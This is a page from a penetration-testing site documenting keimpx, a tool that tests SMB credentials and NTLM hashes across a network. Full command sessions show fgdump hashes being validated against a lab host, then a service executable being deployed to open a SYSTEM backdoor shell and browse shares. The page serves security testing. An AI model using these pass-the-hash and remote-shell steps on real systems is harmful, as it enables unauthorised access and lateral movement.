VulnerabilityAssessment.co.uk

keimpx

keimpx is an open source tool, released under a modified version of Apache License 1.1. It can be used to quickly check for the usefulness of credentials across a network over SMB. Credentials can be:

Combination of user / plain-text password.
Combination of user / NTLM hash.
Combination of user / NTLM logon session token.

If any valid credentials has been discovered across the network after its attack phase, the user is asked to choose which host to connect to and which valid credentials to use, then he will be prompted with an interactive SMB shell where the user can:

Spawn an interactive command prompt.
Navigate through the remote SMB shares: list, upload, download files, create, remove files, etc.
Deploy and undeploy his own service, for instance, a backdoor listening on a TCP port for incoming connections.
List users details, domains and password policy.
More to come, see here.

It is available from here

Pre-requisites

Python

p2exe (available from here)

impacket (available from here)

pycrypto (available from here)

The last three pre-requisites just require the following to install; python setup.py install

Syntax

C:\keimpx-0.2>python keimpx.py -h

keimpx 0.2
by Bernardo Damele A. G. <bernardo.damele@gmail.com>

Usage: keimpx.py [options]

Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v VERBOSE Verbosity level: 0-2 (default 0)
-t TARGET Target address
-l LIST File with list of targets
-U USER User
-P PASSWORD Password
--nt=NTHASH NT hash
--lm=LMHASH LM hash
-c CREDSFILE File with list of credentials
-D DOMAIN Domain
-d DOMAINSFILE File with list of domains
-p PORT SMB port: 139 or 445 (default 445)
-n NAME Local hostname
-T THREADS Maximum simultaneous connections (default 10)
-b Batch mode: do not ask to get an interactive SMB shell

Examples

Test only for usefulness of a single pair username/plain-text onto a single system

$ python keimpx.py -t 172.16.77.130 -U Administrator -P validpassword -v 1 -b
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

keimpx 0.2
by Bernardo Damele A. G. <bernardo.damele@gmail.com>

[16:49:35] [INFO] Loading targets
[16:49:35] [INFO] Loading credentials
[16:49:35] [INFO] Loading domains
[16:49:35] [INFO] Loaded 1 unique targets
[16:49:35] [INFO] Loaded 1 unique credentials
[16:49:35] [INFO] No domains specified, using NULL domain
[16:49:35] [INFO] Attacking host 172.16.77.130:445
[16:49:35] [INFO] Valid credentials on 172.16.77.130:445: Administrator/testpass
[16:49:35] [INFO] Attack on host 172.16.77.130:445 finished

The credentials worked in total 1 times

TARGET SORTED RESULTS:

172.16.77.130:445
Administrator/testpass

USER SORTED RESULTS:

Administrator/testpass
172.16.77.130:445

$

Test for usefulness of dumped hashes onto a single system and interact with it afterwards

$ cat /tmp/hashes_and_plain
# Lines output of fgdump
Administrator:500:0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210:::
ASPNET:1003:F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
# Cracked plain-text password
testuser testpass

$ python keimpx.py -t 172.16.77.130 -c /tmp/hashes_and_plain -v 1
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

keimpx 0.2
by Bernardo Damele A. G. <bernardo.damele@gmail.com>

[15:53:23] [INFO] Loading targets
[15:53:23] [INFO] Loading credentials
[15:53:23] [INFO] Loading domains
[15:53:23] [INFO] Loaded 1 unique targets
[15:53:23] [INFO] Loaded 4 unique credentials
[15:53:23] [INFO] No domains specified, using NULL domain
[15:53:23] [INFO] Attacking host 172.16.77.130:445
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
[15:53:23] [INFO] Wrong credentials on 172.16.77.130:445: Guest/BLANK (2239)
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: testuser/testpass
[15:53:23] [INFO] Attack on host 172.16.77.130:445 finished

The credentials worked in total 3 times

TARGET SORTED RESULTS:

172.16.77.130:445
Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
testuser/testpass

USER SORTED RESULTS:

Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
172.16.77.130:445

ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
172.16.77.130:445

testuser/testpass
172.16.77.130:445

Do you want to get a shell from any of the targets? [Y/n] y
Which target do you want to connect to?
[1] 172.16.77.130:445
> 1
Which credentials do you want to use to connect?
[1] Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
[2] ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
[3] testuser/testpass
> 3
[15:53:46] [INFO] type 'help' for help menu
# shares
[1] print$ (type: 0, comment: Printer Drivers)
[2] C$ (type: 0, comment: Default share)
[3] CanonMP9 (type: 1, comment: Canon MP980 series Printer)
[4] share (type: 0, comment: )
[5] C (type: 0, comment: )
[6] CanonMP9.2 (type: 1, comment: Canon MP980 series Printer (Copy 1))
[7] IPC$ (type: 3, comment: Remote IPC)
[8] ADMIN$ (type: 0, comment: Remote Admin)
Which share do you want to connect to? (default 1) 2
# dir
Wed Sep 19 10:11:41 2007 AUTOEXEC.BAT
Sat Sep 12 15:38:04 2009 208 boot.ini
[...]
# exit
$

Test for usefulness of dumped hashes onto a single system and spawn a command prompt

$ cat /tmp/hashes_and_plain
# Lines output of fgdump
Administrator:500:0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210:::
ASPNET:1003:F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
# Cracked plain-text password
testuser testpass

$ python keimpx.py -t 172.16.77.130 -c /tmp/hashes_and_plain -v 1
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

keimpx 0.2
by Bernardo Damele A. G. <bernardo.damele@gmail.com>

[15:53:23] [INFO] Loading targets
[15:53:23] [INFO] Loading credentials
[15:53:23] [INFO] Loading domains
[15:53:23] [INFO] Loaded 1 unique targets
[15:53:23] [INFO] Loaded 4 unique credentials
[15:53:23] [INFO] No domains specified, using NULL domain
[15:53:23] [INFO] Attacking host 172.16.77.130:445
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
[15:53:23] [INFO] Wrong credentials on 172.16.77.130:445: Guest/BLANK (2239)
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: testuser/testpass
[15:53:23] [INFO] Attack on host 172.16.77.130:445 finished

The credentials worked in total 3 times

TARGET SORTED RESULTS:

172.16.77.130:445
Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
testuser/testpass

USER SORTED RESULTS:

Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
172.16.77.130:445

ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
172.16.77.130:445

testuser/testpass
172.16.77.130:445

Do you want to get a shell from any of the targets? [Y/n] y
Which target do you want to connect to?
[1] 172.16.77.130:445
> 1
Which credentials do you want to use to connect?
[1] Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
[2] ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
[3] testuser/testpass
> 1
[15:53:46] [INFO] type 'help' for help menu
# shell
[16:53:07] [INFO] Uploading the service executable to 'ADMIN$\ihtell.exe'
[16:53:07] [INFO] Connecting to the SVCCTL named pipe
[16:53:07] [INFO] Creating the service 'uYRYKB'
[16:53:07] [INFO] Starting the service 'uYRYKB'
[16:53:07] [INFO] Connecting to backdoor on port 2090, wait..
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection 3:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 172.16.77.130
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.77.2

C:\WINDOWS\system32>exit
exit
[16:53:20] [INFO] Connecting to the SVCCTL named pipe
[16:53:20] [INFO] Stopping the service 'uYRYKB'
[16:53:20] [INFO] Deleting the service 'uYRYKB'
[16:53:20] [INFO] Removing the service executable 'ADMIN$\ihtell.exe'
# exit
$

Use the valid pair of credentials to interact with it afterwards

$ python keimpx.py -t 172.16.77.130 -U Administrator -P validpassword
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

keimpx 0.2
by Bernardo Damele A. G. <bernardo.damele@gmail.com>

The credentials worked in total 1 times

TARGET SORTED RESULTS:

172.16.77.130:445
Administrator/validpassword

USER SORTED RESULTS:

Administrator/validpassword
172.16.77.130:445

Do you want to get a shell from any of the targets? [Y/n] y
Which target do you want to connect to?
[1] 172.16.77.130:445
>
Which credentials do you want to use to connect?
[1] Administrator/validpassword
>
# help
Generic options
===============
help - show this message
verbosity {level} - set verbosity level (0-2)
info - list system information
exit - terminates the SMB session and exit from the tool

Shares options
==============
shares - list available shares
use {sharename} - connect to an specific share
cd {path} - changes the current directory to {path}
pwd - shows current remote directory
ls {path} - lists all the files in the current directory
cat {file} - display content of the selected file
download {filename} - downloads the filename from the current path
upload {filename} - uploads the filename into the current path
mkdir {dirname} - creates the directory under the current path
rm {file} - removes the selected file
rmdir {dirname} - removes the directory under the current path

Services options
================
deploy {service name} {local file} [service args] - deploy remotely a service executable
undeploy {service name} {remote file} - undeploy remotely a service executable

Shell options
=============
shell [port] - spawn a shell listening on a TCP port, by default 2090/tcp

Users options
=============
users [domain] - list users, optionally for a specific domain
pswpolicy [domain] - list password policy, optionally for a specific domain
domains - list domains to which the system is part of

Registry options (Soon)
================
regread {registry key} - read a registry key
regwrite {registry key} {registry value} - add a value to a registry key
regdelete {registry key} - delete a registry key

# shares
[1] print$ (type: 0, comment: Printer Drivers)
[2] C$ (type: 0, comment: Default share)
[3] CanonMP9 (type: 1, comment: Canon MP980 series Printer)
[4] share (type: 0, comment: )
[5] C (type: 0, comment: )
[6] CanonMP9.2 (type: 1, comment: Canon MP980 series Printer (Copy 1))
[7] IPC$ (type: 3, comment: Remote IPC)
[8] ADMIN$ (type: 0, comment: Remote Admin)
Which share do you want to connect to? (default 1) 2
# dir
Wed Sep 19 10:11:41 2007 AUTOEXEC.BAT
Sat Sep 12 15:38:04 2009 208 boot.ini
[...]
# cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard" /fastdetect /NoExecute=OptOut
# cd Windows\Temp
# dir
Fri Nov 6 18:30:15 2009 <DIR> .
Fri Nov 6 18:30:15 2009 <DIR> ..
Wed May 6 12:51:52 2009 <DIR> Cookies
Wed May 6 12:51:52 2009 <DIR> History
Wed May 6 12:51:52 2009 <DIR> Temporary Internet Files
# !ls <- Prepending an exclamation mark, executes the command on your local system
contrib
keimpx.py
setup.py

# upload keimpx.py
# dir
Thu Nov 12 15:36:02 2009 <DIR> .
Thu Nov 12 15:36:02 2009 <DIR> ..
Wed May 6 12:51:52 2009 <DIR> Cookies
Wed May 6 12:51:52 2009 <DIR> History
Thu Nov 12 15:36:02 2009 45838 keimpx.py
Wed May 6 12:51:52 2009 <DIR> Temporary Internet Files
# users
Administrator
User ID: 500
Group ID: 513
Enabled: True
Logon count: 187
Last Logon: Thu, 12 Nov 2009 15:37:13
Kickoff: Mon, 14 Sep 2009 10:15:47
Password can change: Mon, 14 Sep 2009 10:15:47
Password must change: Infinity
Bad password count: 0
Logon hours: Unlimited
Account Name: Administrator
Description: Built-in account for administering the computer/domain
ASPNET
User ID: 1003
Group ID: 513
[...]
# domains
Domains:
W2K3DEV
Builtin
# exit
$

IT Security News:

more........

Pen Testing Framework:

Information:

Pen Test Framework - new version released.

DNS Tools

Exploiting NFS

© VulnerabilityAssessment.co.uk 13 February 2010